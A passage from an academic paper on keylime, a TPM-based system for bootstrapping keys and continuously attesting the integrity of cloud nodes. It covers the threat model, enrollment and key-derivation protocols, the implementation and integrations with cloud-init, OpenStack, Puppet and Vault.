to\naddress this limitation with a new OS that makes trusted\ncomputing a \frst-class citizen, and supports introspection\nto validate run-time state [37]. Several proposals exist for\nproviding run-time integrity monitoring including LKIM [24]\nand DynIMA [8]. These systems ensure that a running sys-\ntemis in a known state, allowing a veri\fer to validate not\nonly that what was loaded was known, but that it has not\nbeen tampered with while it was running.\nIn addition to operating system validation, others have\nleveraged trusted computing and integrity measurement to\nsupport higher-level services, such as protected access to\ndata when the client is o\u000fine [23], or to enforce access\npolicies on data [26]. Others have proposed mechanisms\nto protect the server from malicious clients, e.g., in online\ngaming [1], or applications from a malicious operating sys-\ntem [6, 7, 15]. However, these proposals do not account for\nthe challenges of migrating applications to a cloud environ-\nment, and often assume existing infrastructure to support\ntrusted computing key management.\nIaaS Cloud Services In the IaaS cloud service model, users\nrequest an individual compute resource to execute their ap-\nplication. For example, users can provision physical hard-\nware, virtual machines, or containers. In this paper, we\nrefer to any of these tenant-provisioned IaaS resources as\ncloud nodes . Users provision nodes either by uploading a\nwhole image to the provider or by con\fguring a pared-down\nbase image that the provider makes available. Users often\nbegin by customizing a provider-supplied image, then create\ntheir own images (using a tool like Packer6) to decrease the\namount of time it takes for a node to become ready.\ncloud-init is a standard cross-provider (e.g., Amazon\nEC2, Microsoft Azure...) mechanism that allows cloud ten-\nants to specify bootstrapping data. It accepts a YAML-\nformatted description of what bootstrapping actions should\nbe taken and supports plugins to take those actions. Exam-\nples of such actions include: adding users, adding package\nrepositories, or running arbitrary scripts. Users of cloud\ncomputing resources at scale typically spawn new cloud in-\nstances using an application programming interface and pass\nalong enough bootstrapping information to allow the in-\nstance to communicate with a con\fguration management\nplatform (such as Chef7or Puppet, etc.) for further instance-\nspeci\fc con\fguration. These bootstrapping instructions are\nnot encrypted, meaning that a provider could intercept se-\ncrets passed via the bootstrapping instructions. In our re-\nsearch, we found that organizations will either (a) send an\nunprotected pre-shared key for Puppet in their cloud-init\nbootstrapping actions, or (b) rely on some weaker method of\nproving identity such as going o\u000b the certi\fcate's common\nname (hostname).\n6https://www.packer.io/\n7https://www.chef.io/chef/3. DESIGN\nTo address the limitations of current approaches, we con-\nsider the union of trusted computing and IaaS to provide\na hardware root-of-trust that tenants leverage to establish\ntrust in the cloud provider's infrastructure and in their own\nsystems running on that infrastructure. This section consid-\ners the threats that keylime addresses, and how to leverage\nexisting trusted computing constructs in a virtualized envi-\nronment while limiting complexity and overhead.\n3.1 Threat Model\nOur goal is to minimize trust in the cloud provider and\ncarefully account for all concessions we must make to enable\ntrusted computing services. We assume the cloud provider is\nsemitrusted, i.e., they are organizationally trustworthy but\nare still susceptible to compromise or malicious insiders. We\nassume the cloud provider has processes, technical controls,\nand policy in place to limit the impact of such compromise\nfrom spreading across their entire infrastructure. Thus, in\nthe semitrusted model, we assume that some fraction of the\ncloud provider's resources may be under the control of the\nadversary (e.g., a rogue system administrator may control a\nsubset of racks in an IaaS region).\nSpeci\fcally, we assume that the adversary can monitor or\nmanipulate compromised portions of the cloud network or\nstorage arbitrarily. We assume that the adversary may not\nphysically tamper with any host's (e.g., hypervisor or bare\nmetal node) CPU, bus, memory, or TPM8. In virtualized en-\nvironments, the security of our system relies upon keeping\ncryptographic keys in VM memory. Therefore, we assume\nthat the provider does not purposefully deploy a hypervisor\nwith the explicit capability to spy on tenant VM memory\n(e.g., Ether [9]). We assume that TPM and system manu-\nfacturers have created the appropriate endorsement creden-\ntials and have some mechanism to test their validity (i.e.,\nsigned certi\fcates)\nFinally, we assume that the attacker's goal is to obtain\npersistent access to a tenant system in order to steal, dis-\nrupt, or deny the tenant's data and services. To accomplish\npersistence the attacker must modify the code loading or\nrunning process. We assume that such modi\fcations would\nbe detected by load-time integrity measurement of the hy-\npervisor or kernel [19], runtime integrity measurement of the\nkernel [24], and integrity measurement of applications [30].\n3.2 Architecture\nTo introduce the architecture of keylime we \frst describe\na simpli\fed architecture for managing trusted computing\nservices for a single organization, or cloud tenant, without\nvirtualization. We then expand this simpli\fed architecture\ninto the full keylime architecture, providing extensions that\nallow layering of provider and tenant trusted computing ser-\nvices and supporting multiple varieties of IaaS execution\nisolation (i.e., bare metal, virtual machines, or containers).\nFigure 3 depicts the full system architecture with layering.\nThe \frst step in bootstrapping the architecture is to create\na tenant-speci\fc registrar. The registrar stores and certi\fes\nthe public AIK s of the TPMs in the tenant's infrastructure.\nIn the simpli\fed architecture, the tenant registrar can be\nhosted outside the cloud in the tenant's own infrastructure\n8This is similar to the threat model assumed by the TPM,\nwhere physical protections are not a strict requirement to\nbe compliant with the speci\fcation.Table 1: Keys used by keylime and their purpose.\nKey Type Purpose\nEK RSA 2048 Permanent TPM credential that identi\fes the TPM hardware.\nSRK RSA 2048 TPM key that protects TPM created private keys when they are stored outside the TPM.\nAIK RSA 2048 TPM key used to sign quotes.\nKe AES-256 Enrollment key created by the registrar and used to activate the AIK.\nKb AES-256 Bootstrap key the tenant creates. keylime securely delivers to the node.\nU; V 256bit random Trivial secret shares of Kb, derived with random 256bit V:U=Kb\bV.\nNK RSA 2048 Non-TPM software key used to protect secret shares U; V in transit.\nNode\rRegistrar\rID,AIKpub,EKpub\rEncEK(H(AIKpub),Ke)\rHMACKe(ID)\nFigure 2: Physical node registration protocol.\nor could be hosted on a physical system in the cloud. The\nregistrar is only a trust root and does not store any tenant\nsecrets. The tenant can decide to trust the registrar only\nafter it attests its system integrity. Since the registrar is a\nsimple a component with static code, verifying its integrity\nis straight forward.\nTo create a registrar, we can leverage existing standards\nfor the creation and validation of AIK s by creating a TCG\nPrivacy CA [38]. To avoid the complexity of managing a\ncomplex PKI and because there's no need for privacy within\na single tenant's resources, we created a registrar that simply\nstores valid TPM AIK public keys indexed by node UUID.\nClients request public AIK s from the registrar through a\nserver-authenticated TLS channel.\nTo validate the AIK s in the registrar, we developed a\nTPM-compatible enrollment protocol (see Figure 2). The\nnode begins by sending its ID and standard TPM creden-\ntials ( EKpub; AIK pub) to the registrar. The registrar then\nchecks the validity of the TPM EK with the TPM manu-\nfacturer. Importantly, the generation and installation of the\nEKby the TPM manufacturer roots the trust upon which\nthe rest of our system relies. If the EKis valid, the regis-\ntrar creates an ephemeral symmetric key Keand encrypts it\nalong with a hash of the public AIK , denoted H(AIK pub),\nwith the TPM EKpub. The node uses the ActivateIden-\ntity TPM command to decrypt Ke. The TPM will only\ndecrypt Keif has EKprivand if it has AIK privcorrespond-\ning to H(AIK pub). The nodes uses an HMAC to prove that\nit can decrypt the ephemeral key Ke. The registrar then\nmarks that AIK as being valid so that it can be used to\nvalidate quotes.\nThe core component of keylime is an out of band cloud\nveri\fer (CV) similar to the one described by Schi\u000bman et\nal. [34]. Each cloud organization will have at least one CV\nthat is responsible for verifying the system state of the orga-\nnization's IaaS resources. The tenant can host the CV in the\nIaaS cloud or on-premises at their own site (we give options\nfor tenant registrar and CV deployment in Section 3.2.1).\nThe CV relies upon the tenant registrar for validating that\ntheAIK s used to sign TPM quotes are valid, or more specif-\nically, that the AIK s are recognized by the tenant as beingassociated with machines (physical or virtual) owned by the\ntenant. The registrar, CV, and cloud node service are the\nonly components in keylime that manage and use keys and\npublic key infrastructures associated with the TPM.\nThe CV participates in a three party key derivation pro-\ntocol (we describe in detail in Section 3.2.2) where the CV\nand tenant cooperate to derive a key, Kb, at the cloud node\nto support initial storage decryption. The tenant uses Kbto\nprotect tenant secrets and trust relationships. The tenant\ncan use this key to unlock either its disk image or to unlock\ntenant-speci\fc con\fguration provided by cloud-init .\nThis protocol is akin to the method by which a user can\nuse the TPM to decrypt his or her disk in a laptop. To allow\nthe decryption key to be used to boot the laptop, the user\nmust enter a password (demonstrating the user's intent) and\nTPM PCRs must match a set of whitelisted integrity mea-\nsurements (demonstrating the validity of the system that\nwill receive the decryption key). In an IaaS cloud environ-\nment, there is neither a trusted console where a user can\nenter a password nor is there a way to pre-seed the TPM\nwith the storage key or measurement whitelist. Our pro-\ntocol uses secret sharing to solve these problems by rely-\ning externally upon the CV for integrity measurement and\nby having the tenant directly interact with the cloud node\nto demonstrate intent to derive a key. The protocol then\nextends beyond bootstrapping to enable continuous system\nintegrity monitoring. The CV periodically polls each cloud\nnode's integrity state to determine if any runtime policies\nhave been violated. The frequency with which the CV re-\nquests and veri\fes each node's integrity state will de\fne the\nlatency between an integrity violation and detection.\nTo cleanly link trust and integrity measurement rooted\nin the TPM to higher-level services, we create a parallel\nsoftware-only PKI and a simple service to manage it. The\ngoal is to remove the need to make each service trusted\ncomputing-aware, e.g. integrating Trusted Network Connect\ninto StrongSwan9. We refer to this parallel software-only\nservice as the software CA. To bootstrap this service, we\nuse the key derivation bootstrap protocol to create a cloud\nnode to host the service. Since the bootstrap key derivation\nprotocol ensures that the node can only derive a key if the\ntenant authorizes it and if the node's integrity state is ap-\nproved, we can encrypt the private key for the software CA\nand pass it to the node upon provisioning. Once established,\nwe can then start other cloud nodes and securely pass them\nkeys signed by this CA. The linkage to the hardware root\nof trust, the secure bootstrapping of relevant keys, and user\nintent to create new resources are again ensured using the\n9https://wiki.strongswan.org/projects/strongswan/wiki/\nTrustedNetworkConnectTPM / Platform Manufacturer Tenant Registrar Tenant CV Software CA (Cloud Node VM) vTPM Cloud Node VM vTPM Tenant \nVirtual Enrollment Bound at manufacturing Bootstrap Key derivation \nIdentity Key Bootstrap Key Kb\rCertificate authority Trust Hypervisor TPM Provider Registrar Deep Quote Provider Whitelist Authority Hypervisor TPM Enrollment \nRevocation Service Signed whitelists \nAIK good? TPM Good? AIK good? vAIK good? \nunwrap Figure 3: Layered keylime trusted computing architecture.\nbootstrap key derivation protocol. Once established, stan-\ndard tools and services like IPsec or Puppet can now directly\nuse the software CA identity credentials that each node now\npossesses.\nTo complete the linkage between the trusted computing\nservices and the software identity keys, we need a mechanism\nto revoke keys in the software PKI when integrity violations\noccur in the trusted computing layer. The CV is responsible\nfor notifying the software CA of these violations. The CV\nincludes metadata about the nature of the integrity viola-\ntion, which allows the software CA to have a response policy.\nThe software CA supports standardized methods for certi\f-\ncate revocation like signed revocation lists or by hosting an\nOCSP responder. To support push noti\fcations of failures,\nthe software CA can also publish signed noti\fcations to a\nmessage bus. This way services that directly support revo-\ncation actions can subscribe to noti\fcations (e.g., to trigger\na re-key in a secret manager like Vault).\n3.2.1 Layering Trust\nWe next expand this architecture to work across the layers\nof virtualization common in today's IaaS environments. Our\ngoal is to create the architecture described previously that\ncleanly links common security services to a trusted com-\nputing layer in a cloud tenant's environment. Thus, in a\nVM hosting environment like Amazon EC2 or OpenStack,\nwe aim to create trusted computing enabled software CAs\nand tenant nodes inside of virtual machine instances. Note\nthat, in a bare-metal provisioning environment like IBM\nSoftlayer10, HaaS [13], or OpenStack Ironic11, we can di-\nrectly utilize the simpli\fed architecture where there is no\ntrust layering.\nWe observe that IaaS-based virtual machines or physical\nhosts all provide a common abstraction of isolated execu-\ntion. Each form of isolated execution in turn needs a root of\ntrust on which to build trusted computing services. Due to\nthe performance and resource limitations of typical TPMs\n(e.g., taking 500 or more milliseconds to generate a quote,\nand only supporting a \fxed number of PCRs), direct multi-\nplexed use of the physical TPM will not scale to the numbers\n10http://www.softlayer.com\n11https://wiki.openstack.org/wiki/Ironicof virtual machines that can be hosted on a single modern\nsystem. As described by Berger et al. [2] and as implemented\nin Xen [10], we utilize a virtualized implementation of the\nTPM. Each VM has its own software TPM (called a vTPM)\nwhose trust is in turn rooted in the hardware TPM of the\nhosting system. The vTPM is isolated from the guest that\nuse it, by running in a separate Xen domain.\nThe vTPM interface is the same as a hardware TPM. The\nonly exception to this, is that the client can request a deep-\nquote12that will get a quote from the hardware TPM in\naddition to getting a quote from the vTPM. These quotes\nare linked together by including a hash of the vTPM quote\nand nonce in the hardware TPM quote's nonce. Deep quotes\nsu\u000ber from the slow performance of hardware TPMs, but as\nwe'll show in later this section, we can limit the use of deep\nquotes while still maintaining reasonable performance and\nscale and maintaining security guarantees.\nTo assure a chain of trust that is rooted in hardware, we\nneed the IaaS provider to replicate some of the trusted com-\nputing service infrastructure in their environment and allow\nthe tenant trusted computing services to query it. Specif-\nically, the provider must establish a registrar for their in-\nfrastructure, must publish an up-to-date signed list of the\nintegrity measurements of their infrastructure (hosted by a\nwhitelist authority service), and may even have their own\nCV. The tenant CV will interact with the whitelist author-\nity service and the provider's registrar to verify deep quotes\ncollected by the infrastructure.\nDespite the fact that most major IaaS providers run closed-\nsource hypervisors and would provide opaque integrity mea-\nsurements [16], we \fnd there is still value in verifying the\nintegrity of the provider's services. By providing a known-\ngood list of integrity measurements, the provider is com-\nmitting to a version of the hypervisor that will be deployed\nwidely across their infrastructure. This prevents a targeted\nattack where the a single hypervisor is replaced with a mali-\ncious version designed to spy on the tenant (e.g., the provider\nis coerced by a government to monitor a speci\fc cloud ten-\n12We use similar notation for quotes as we do for deep quotes,\nDeepQuote AIK;vAIK (nonce; PCR i:di; vPCR j:dj), ex-\ncept that PCRs may be from both physical and virtual sets\nof PCRS. We use virtual PCR #16 to bind data.Node\rTenant \u0000Registrar\rID,vAIKpub,vEKpub\rEncvEK(H(AIKpub),Ke)\rProvider\u0000Registrar\rID\rAIK\rServer\tTLS\tDeepQuoteAIK,vAIK(H(Ke),\rv16:H(ID,vAIKpub,vEKpub))\rOK\rFigure 4: Virtual node registration protocol.\nant). Thus, an attacker must subvert both the code loading\nprocess on all the hypervisors and the publishing and signing\nprocess for known-good measurements. In our semitrusted\nthreat model, we assume the provider has controls and mon-\nitoring which limit the ability of a rogue individual to ac-\ncomplish this.\nAs in Section 3.2, we begin with the establishment of a\ntenant registrar and cloud veri\fer. There are multiple op-\ntions for hosting these services securely: 1) in a bare metal\nIaaS instance with TPM, 2) on-tenant-premises in tenant-\nowned hardware, 3) in a small trusted hardware appliance\ndeployed to the IaaS cloud provider, and 4) in an IaaS vir-\ntual machine. The \frst three of these options rely upon\nthe architecture and protocols we've already discussed. The\nlast option requires the tenant to establish an on-tenant-\npremises CV and use that to bootstrap the tenant registrar\nand CV. This on-tenant-premises CV identi\fes and checks\nthe integrity of the tenant's virtualized registrar and CV,\nwho then in turn are responsible for the rest of the tenant's\nvirtualized infrastructure.\nThe primary motivations for a tenant choosing between\nthese options are the detection latency for integrity viola-\ntions, scale of IaaS instances in their environment, band-\nwidth between the tenant and the IaaS cloud, and cost. Op-\ntion 1 provides maximum performance but at higher cost.\nOption 2 will by limited by bandwidth and requires more\ncosts to maintain resources outside of the cloud. Option 3 is\na good trade-o\u000b between cost and performance for a small\ncloud tenant with only tens of nodes or who can tolerate a\nlonger detection latency. Finally, Option 4 provides compat-\nibility with current cloud operations, good performance and\nscalability, and low cost at the expense of increased complex-\nity. In Section 5, we examine the performance trade-o\u000bs of\nthese options including a low-cost registrar and CV appli-\nance (Option 3) we implemented on a Raspberry Pi.\nOnce we have created the tenant registrar and CV, we can\nbegin securely bootstrapping nodes into the environment.\nAs before, the \frst node to establish is a virtualized software\nCA and we do this by creating a private signing key o\u000fine\nand protecting it with a key that will be derived by the\nbootstrap key derivation protocol. The following process\nwill be the same for all tenant cloud nodes. When a node\nboots, it will get a vTPM from the IaaS provider.\nThe process of enrolling a vTPM into the tenant regis-\ntrar needs to securely associate the vTPM credentials, e.g.,\n(vEK ,vAIK ), with a physical TPM in the provider's infras-\ntructure (see Figure 4). The tenant registrar cannot directly\nverify the authenticity of the vEK because it is virtual and\nhas no manufacturer. To address this, we use a deep quote to\nbind the virtual TPM credentials to a physical TPM AIK .\nThe vTPM enrollment protocol begins like the physical\nTPM enrollment protocol by sending ID;(EKpub; AIK pub)to the tenant registrar. The tenant registrar then returns\nEncvEK(H(AIK pub); Ke) without additional checks. The\nvirtual node then decrypts Keusing ActivateIdentity func-\ntion of its vTPM. The node next requests a deep quote using\na hash of Keas the nonce to both demonstrate the freshness\nof the quote and knowledge of Keto the tenant registrar.\nIt also uses virtual PCR #16 to bind the vTPM credentials\nand ID to the deep quote. Upon receiving the deep quote,\nthe tenant registrar asks the provider registrar if the AIK\nfrom the deep quote is valid. The tenant registrar also re-\nquests the latest valid integrity measurement whitelists from\nthe provider. Now the tenant registrar can check the va-\nlidity of the deep quote's signature, ensure that the nonce\nisH(Ke), con\frm the binding data in PCR #16 matches\nwhat was provided in the previous step, and check the phys-\nical PCRs values in the deep quote against the provider's\nwhitelist. Only if the deep quote is valid will the tenant\nregistrar mark the vAIK as being valid.\nWhen considering the cost of performing a deep quote,\nthe provider must carefully consider the additional latency\nof the physical TPM. Deep quotes provide a link between\nthe vTPM and the physical TPM of the machine, and new\nenrollments should always include deep quotes. When con-\nsidering if deep quotes should be used as part of periodic\nattestation, we must understand what trusted computing\ninfrastructure the provider has deployed. If the provider is\ndoing load time integrity only (e.g., secure boot), then deep\nquotes will only re\rect the one-time binding at boot between\nthe vTPM and the physical TPM and the security of the\nvTPM infrastructure. If the provider has runtime integrity\nchecking of their infrastructure, there is value in the ten-\nant performing periodic attestation using deep quotes. In\nthe optimal deployment scenario, the provider can deploy\nkeylime and provide tenants with access to the integrity\nstate of the hypervisors that host tenant nodes. To limit\nthe impact of slow hardware TPM operations, the provider\ncan utilize techniques like batch attestation where multiple\ndeep quote requests from di\u000berent vTPMs can be combined\ninto a single hardware TPM operation [28, 31].\n3.2.2 Key Derivation Protocol\nWe now introduce the details of our bootstrap key deriva-\ntion protocol (Figure 5). The goal of this protocol is for the\ncloud tenant to obtain key agreement with a cloud node they\nhave provisioned in an IaaS system. The protocol relies upon\nthe CV to provide integrity measurement of the cloud node\nduring the protocol. The tenant also directly interacts with\nthe cloud node to demonstrate their intent to spawn that re-\nsource and allow it to decrypt sensitive contents. However,\nthe tenant does not directly perform integrity measurement.\nThis separation of duties is bene\fcial because the attesta-\ntion protocols may operate in parallel and it simpli\fes de-\nployment by centralizing all integrity measurement, white\nlists, and policy in the CV.\nTo begin the process, the tenant generates a fresh random\nsymmetric encryption key Kb. The cloud tenant uses AES-\nGCM to encrypt the sensitive data to pass to the node dwith\nKb, denoted EncKb(d). The tenant then performs trivial\nsecret sharing to split Kbinto two parts U, which the tenant\nwill retain and pass directly to the cloud node and V, which\nthe tenant will share with the CV to provide to the node\nupon successful veri\fcation of the node's integrity state. To\nobtain these shares the tenant generates a secure randomTenant\rCloud Veri0ier\rNode\rRegistrar\rID, V, IP, port, whitelist\rnCV, mask\rQuoteAIK(nCV,16:H(Nkpub),xi :yi),NKpub\rValid AIK?\rEncNK(V)\rnt\rQuoteAIK(nt,16:H(NKpub))),NKpub\rValid AIK?\r\nA\r\nB\r\nC\rMutual TLS Server TLS No TLS Legend\tEncNK(U),HMACKb(ID)Figure 5: Three Party Bootstrap Key Derivation Protocol.\nvalue Vthe same length as Kband computes U=Kb\bV.\nIn the next phase of the protocol, the tenant requests the\nIaaS provider to instantiate a new resource (i.e., a new vir-\ntual machine). The tenant sends EncKb(d) to the provider\nas part of the resource creation. The data dmay be con\fgu-\nration metadata like a cloud-init script13. Upon creation,\nthe provider returns a unique identi\fer for the node uuid\nand an IP address at which the tenant can reach the node.\nAfter obtaining the node uuid and IP address, the tenant\nnoti\fes the CV of their intent to boot a cloud node (see area\nAin Figure 5). The tenant connects to the CV over a secure\nchannel, such as mutually authenticated TLS, and provides\nv,uuid, node IP, and a TPM policy. The TPM policy speci-\n\fes a white list of acceptable PCR values to expect from the\nTPM of the cloud node. At this point the CV and tenant\ncan begin the attestation protocol in parallel.\nThe attestation protocol of our scheme is shared between\nthe interactions of the CV and the cloud node ( B) and that\nof the tenant and the cloud node ( C) with only minor dif-\nferences between them (Figure 5). The protocol consists\nof two message volleys the \frst for the initiator (either CV\nor tenant) to request a TPM quote and the second for the\ninitiator to provide a share of Kbto the cloud node upon\nsuccessful validation of the quote. Since we use this pro-\ntocol to bootstrap keys into the system, there are no ex-\nisting software keys with which we create a secure channel.\nThus, this protocol must securely transmit a share of Kb\nover an untrusted network. We accomplish this by creat-\ning an ephemeral asymmetric key pair on the node, denoted\nNK, outside of the TPM14. As in Section 3.2.1, we use PCR\n#16's value in a TPM quote to bind NK to the identity of\n13Because Kbmay not be re-used in our protocol, the cost\nof re-encrypting large disk images for each node may be\nprohibitive. We advocate for encrypting small sensitive data\npackets like a cloud-init script, and then establish local\nstorage encryption with ephemeral keys.\n14NK could also be generated and reside inside the TPM.\nHowever, since it is ephemeral, is only used for transport\nsecurity and it is authenticated by the TPM using the quote,\nwe found the added complexity of also storing it in the TPM\nunneeded.the TPM thereby authenticating NK. The initiator can\nthen encrypt its share of Kbusing NKpuband securely re-\nturn it to the cloud node.\nThe di\u000berences in the attestation protocol between CV\nand tenant arise in how each validates TPM quotes. Be-\ncause we wish to centralize the adjudication of integrity\nmeasurements to the CV, the TPM quote that the tenant\nrequests only veri\fes the identity of the cloud node's TPM\nand doesn't include any PCR hashes. Since the tenant gen-\nerates a fresh Kbfor each cloud node, we are not concerned\nwith leaking Uto a node with invalid integrity state. Fur-\nthermore, because Vis only one share of Kb, the CV cannot\nbe subverted to decrypt resources without user intent.\nWe now describe the attestation protocol in detail. The\ninitiator \frst sends a fresh nonce ( ntfor the tenant as in B\nfrom Figure 5 and nCVfor the cloud veri\fer as in Cfrom\nFigure 5) to the cloud node along with a mask indicating\nwhich PCRs the cloud node should include in its quote. The\nCV sets the mask based on TPM policy exchanged earlier\nand the tenant creates an empty mask. We extend a hash of\nNKpubinto a freshly reset PCR #16. The initiator requests\na quote from the TPM with the given PCR mask. The node\nthen returns Quote AIK(n;16 :H(NKpub); xi;:yi); NK pub\nto the initiator. Additional PCR numbers xiand values yi\nare only included in the quote returned to the cloud veri\fer\nbased on the TPM policy it requested. During the protocol\nto provide U, the tenant also supplies HMAC Kb(ID) to\nthe node. This provides the node with a quick check to\ndetermine if Kbis correct.\nThe initiator then con\frms that the AIK is valid accord-\ning to the tenant registrar over server authenticated TLS. If\nthe initiator is the CV, then it will also check the other PCRs\nto ensure they are valid according to the tenant-speci\fed\nwhitelist. If the node is virtual, then the quote to the CV\nwill also include a deep quote of the underlying hardware\nTPM. The CV will in turn validate it as described in the\nprevious section. Upon successful veri\fcation, the initiator\ncan then return their share of Kb. Thus, the tenant sends\nEncNK(U) and the cloud veri\fer sends EncNK(V) to the\nnode. The cloud node can now recover Kband proceed withthe boot/startup process.\nThe cloud node does not retain KborVafter decryption\nofd. To support node reboot or migration, the cloud node\nstores Uin the TPM NVRAM to avoid needing the tenant\nto interact again. After rebooting, the node must again\nrequest veri\fcation by the CV to obtain Vand re-derive\nKb. If migration is allowed, the provider must take care to\nalso securely migrate vTPM state to avoid losing U.\n4. IMPLEMENTATION\nWe implemented keylime in approximately 5,000 lines of\nPython in four components: registrar, node, CV, and ten-\nant. We use the IBM Software Trusted Platform module\nlibrary [18] to directly interact with the TPM rather than\ngoing through a Trusted Software Stack (TSS) like Trousers.\nThe registrar presents a REST-based web service for en-\nrolling node AIK s. It also supports a query interface for\nchecking the keys for a given node UUID. The registrar use\nHMAC-SHA384 to check the node's knowledge of Keduring\nregistration.\nThe node component runs on the IaaS machine, VM, or\ncontainer and is responsible for responding to requests for\nquotes and for accepting shares of the bootstrap key Kb. It\nprovides an unencrypted REST-based web service for these\ntwo functions.\nTo support vTPM operations, we created a service the\nIaaS provider runs to manage hardware TPM activation and\nvTPM creation/association. This service runs in a desig-\nnated Xen domain and has privileges to interact with the\nXen vtpmmgr domain [11]. We then implemented a utility\nfor the deep quote operation. Since the Xen vTPM imple-\nmentation does not directly return the PCR values from the\nvirtual TPM (i.e., the shallow quote) during a deep quote,\nwe chose to \frst execute a shallow quote, hash its contents\nwith the provided nonce, and place them in the nonce \feld\nof the deep quote. This operation cryptographically binds\nthem together. This operation is not vulnerable to man-in-\nthe-middle attack since there is no other interface to directly\nmanipulate the nonce of a deep quote [36]. We then return\nboth the shallow and deep quotes and require the veri\fer\nchecks both signatures and sets of PCR values.\nThe cloud veri\fer hosts a TLS-protected REST-based web\nservice for control. Tenants add and remove nodes to be\nveri\fed and also query their current integrity state. Upon\nbeing noti\fed of a new node, the CV enqueues metadata\nabout the node onto the quote_request queue where a con-\n\fgurable pool of worker processes will then request a deep\nquote from the node. Upon successful veri\fcation of the\nquote, the CV will use an HTTP POST to send Vto the\nnode. The CV uses PKCS#1 OAEP and with RSA 2048\nkeys to protect shares of Kbin transit.\nThe tenant generates a random 256-bit AES key and en-\ncrypts and authenticates the bootstrap data using AES with\nGalois Counter Mode [27]. The tenant uses trivial XOR-\nbased secret sharing to split KbintoVandU. The tenant\nexecutes a simpli\fed version of the same protocol that the\nCV uses. The tenant checks with the registrar to determine\nif the quote signing AIK is valid and owned by the tenant.\nUpon receiving UandV, the node can then combine them\nto derive Kb. To limit the impact of rogue CVs or tenants\nconnecting to the node's unauthenticated REST interface,\nthe node stores all received UandVvalues and iteratively\ntries each combination to \fnd the correct Kb. Once thenode has correctly derived Kb, it mounts a small in-memory\n\fle system using tmpfs and writes the key there for other\napplications to access.\n4.1 Integration\nWhile the key derivation protocol of keylime is generic\nand can be used to decrypt arbitrary data, we believe the\nmost natural cloud use-case for it is to decrypt a small IaaS\nnode-speci\fc package of data. To enable this use-case we\nhave integrated keylime with the cloud-init package, the\ncombination we call trusted-cloud-init . As described in\nSection 2, cloud-init is widely adopted mechanism to de-\nploy machine-speci\fc data to IaaS resources. To integrate\nkeylime and cloud-init , we patched cloud-init to sup-\nport AES-GCM decryption of the user-data (where cloud-\ninit stores tenant scripts and data). We modi\fed the up-\nstart system in Ubuntu Linux to start the keylime node\nservice before cloud-init . We then con\fgure cloud-init\nto \fnd the key that keylime creates in the tmpfs mounted\n\fle system. After successful decryption, cloud-init deletes\nthe key and scrubs it from memory.\nTo support applications that need node identities that do\nnot manage their own PKIs, we implemented a simple soft-\nware CA. The tenant provisions the software CA by creating\nthe CA private key o\u000fine and delivering it to a new node\nusing trusted-cloud-init . We also deliver certi\fcates to\nthe software CA that allow it and the tenant to mutually au-\nthenticate each other via trusted-cloud-init . To demon-\nstrate the clean separation between the trusted computing\nlayer and the software key management layer, we use the\nZMQ Curve secure channel implementation [14]. This sys-\ntem uses an elliptic curve cryptography scheme dissimilar\nfrom the cryptographic algorithms, keys, and other tech-\nniques the TPM uses.\nTo enroll a new node, the tenant \frst generates a node\nidentity key pair using the software CA client. The soft-\nware CA supports a plugin architecture that allows the ten-\nant to specify what type of key pairs to create (e.g., X.509\nRSA 2048). The tenant then connects securely to the soft-\nware CA over ZMQ and gets the node's identity certi\fcate\nsigned. The tenant can now provision a new node with this\nidentity using trusted-cloud-init . The software CA also\nsupports receiving noti\fcations from the CV if a node later\nfails integrity measurement.\nTo support transparent integration with an IaaS plat-\nform, we patched OpenStack Nova and libvirt to support\nthe creation of companion vTPM Xen domains for each\nuser created instance. We link the OpenStack UUID to the\nkeylime provider registrar. We then implemented a wrap-\nper for the OpenStack Nova command line interface that\nenables trusted-cloud-init . Speci\fcally, our wrapper in-\ntercepts calls to nova boot and automatically encrypts the\nprovided user-data before passing it to OpenStack. It then\ncalls the keylime tenant, which begins the bootstrapping\nprotocol. This allows OpenStack users to transparently use\nkeylime andcloud-init without needing to fully trust the\nOpenStack provider not to tamper or steal the sensitive con-\ntents of their user-data .\n4.2 Demonstration Applications\nWe next describe how keylime can securely bootstrap\nand handle revocation for existing non-trusted computing-\naware applications and services common to IaaS cloud de-ployments.\nIPsec To enable secure network connectivity similar to\nTNC [39], we implemented trusted-cloud-init scripts to\nautomatically encrypt all network tra\u000ec between a tenant's\nIaaS resources. The scripts use the OpenStack API for IP\naddress information and then build con\fgurations for the\nLinux IPsec stack and raccoon15. This con\fguration is also\neasily extensible to a TLS-based VPN like OpenVPN16.\nPuppet To enable secure system con\fguration manage-\nment, we integrated keylime with Puppet We do so by gen-\nerating the signed RSA keys that Puppet uses to communi-\ncate with the Puppet master using the Software CA process\ndescribed previously. These steps bypass the need to either\nuse the insecure autosign option in the Puppet master to\nblindly accept new nodes or to have an operator manually\napprove/deny certi\fcate signing requests from new nodes.\nTo support continuous attestation and integrity measure-\nment, we implemented a plug-in for the CV that noti\fes the\ntenant's Puppet master when a node fails its integrity mea-\nsurements. The master can then revoke that node's access\nto check-in and receive the latest con\fguration data.\nVault While tools like Puppet are often used to provi-\nsion secrets and keys, tenant operators can instead use a\ndedicated secret management system that supports the full\nlifecycle of cryptographic keys directly. To demonstrate this,\nwe have integrated keylime with Vault, a cloud-compatible\nsecret manager. Like Puppet, we use the Software CA to\nprovision RSA certi\fcates for each node and con\fgure Vault\nto use them. We also implemented a revocation plugin for\nthe CV that noti\fes Vault to both revoke access to a node\nthat fails integrity measurement and to re-generate and re-\ndistribute any keys to which that node had access.\nLUKS Finally, to demonstrate our ability to provision\nsecrets instead of cryptographic identities, we implemented a\ntrusted-clout-init script that provides the key to unlock\nan encrypted volume on boot.\n5. EV ALUATION\nIn this section we evaluate the overhead and scalability of\nkeylime in a variety of scenarios. We ran our experiments\non a private OpenStack cluster, a Xen host, and a Raspberry\nPi. In OpenStack, we used standard instance \ravors where\nthe m1.small has 1 vCPU, 2GB RAM, and a 20GB disk,\nand the m1.large has 4 vCPUs, 8GB RAM, an 80GB disk.\nWe used Ubuntu Linux 14.10 as the guest OS in OpenStack\ninstances. The Xen host had one Xeon E5-2640 CPU with\n6 cores at 2.5Ghz, 10Gbit NIC, 64 GB RAM, a WinBond\nTPM, and ran Xen 4.5 on Ubuntu Linux 15.04. The Rasp-\nberry Pi 2 had one ARMv7 with 4-cores at 900Mhz, 1GB\nRAM, 100Mbit NIC, and ran Raspbian 7. We ran each of\nthe following experiments for 1-2 minutes and present aver-\nages of the performance we observed.\n5.1 TPM Operations\nWe \frst establish a baseline for the performance of TPM\noperations with the IBM client library, our Python wrap-\nper code, the Xen virtual TPM, and the physical TPM. We\nbenchmarked both TPM quote creation and veri\fcation on\nthe Xen host (Table 2). We 